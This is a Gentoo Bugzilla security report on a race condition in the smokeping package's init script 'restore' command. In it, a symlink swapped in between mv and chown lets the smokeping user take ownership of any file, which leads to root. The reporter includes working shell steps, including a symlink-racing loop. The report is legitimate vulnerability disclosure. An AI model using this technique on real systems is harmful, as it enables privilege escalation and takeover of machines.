Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 602652

Summary: net-analyzer/smokeping: root privilege escalation via race condition in init script
Product: Gentoo Security Reporter: Michael Orlitzky <mjo>
Component: VulnerabilitiesAssignee: Gentoo Security Audit Team <security-audit>
Status: IN_PROGRESS ---    
Severity: major CC: jer, treecleaner, vapier, zerochaos
Priority: Normal    
Version: unspecified   
Hardware: All   
OS: Linux   
Whiteboard: B1 [ebuild]
Package list:
Runtime testing required: ---

Description Michael Orlitzky gentoo-dev 2016-12-14 15:47:14 UTC
The smokeping ebuilds give ownership of /var/lib/smokeping to the "smokeping" user:

  fowners smokeping:smokeping /var/lib/${PN}

The init script has a "restore" command that trusts the contents of that directory too much:

  for f in `find /var/lib/smokeping -name '*.xml' -print` ; do
      f_rrd=`dirname $f`/`basename $f .xml`.rrd
      mv -f "${f_rrd}" "${f_rrd}.bak"
      chown root:0 "${f_rrd}.bak"
      rrdtool restore "$f" "${f_rrd}"
      chown smokeping:smokeping "${f_rrd}"

The last "chown" can be used to gain root privileges, because $f_rrd can be changed to a symlink between the "mv" and "chown" calls.

I was actually able to exploit this. First, create some files (as the smokeping user) so that the "find" command above has something to play with:

  $ ln -sf /home/mjo/foo.txt /var/lib/smokeping/test.rrd
  $ touch /var/lib/smokeping/test.xml

Now the "restore" action will rename test.rrd, attempt to restore a dump, and then call chown on test.rrd, which it expects contains the restored data. But you can trick it: as the smokeping user, execute,

  while true; do ln -sf /home/mjo/foo.txt /var/lib/smokeping/test.rrd; done;

If you're lucky, one of those links will get created between the "mv" and the "chown", and the init script will change ownership of the symlink target to smokeping:smokeping. (On my machine, it changes /home/mjo/foo.txt to smokeping:smokeping.)

Thus the smokeping user can take ownership of any file on the system.
Comment 1 Thomas Deutschmann gentoo-dev Security 2017-01-08 23:26:13 UTC
@ Maintainers(s): Please tell us how you want to proceed here. Should security take action or will you look into this?
Comment 2 Thomas Deutschmann gentoo-dev Security 2019-12-26 15:28:35 UTC
This is now public.

Please take action (if you cannot fix but still care about package, drop restore function from runscript at least) or let treecleaners last rite.